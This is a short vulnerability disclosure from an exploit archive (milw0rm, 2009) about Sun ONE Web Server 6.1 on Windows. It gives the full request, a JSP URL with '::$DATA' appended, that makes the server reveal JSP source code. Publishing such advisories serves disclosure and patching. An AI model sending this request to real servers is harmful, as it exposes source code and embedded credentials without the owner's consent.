20 lines
468 B
Text
Executable file
20 lines
468 B
Text
Executable file
Sun One WebServer 6.1 JSP Source Viewing vulnerability
|
|
|
|
System: Sun-ONE-Web-Server/6.1, Windows Server 2003
|
|
|
|
SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose
|
|
JSP Source code.
|
|
|
|
A normal URL would look like:
|
|
|
|
http://server/hello.jsp
|
|
|
|
To disclose the contents including source code of a JSP file:
|
|
|
|
http://server/hello.jsp::$DATA
|
|
|
|
Best Regards,
|
|
|
|
Nikolaos Rangos
|
|
|
|
# milw0rm.com [2009-07-09]
|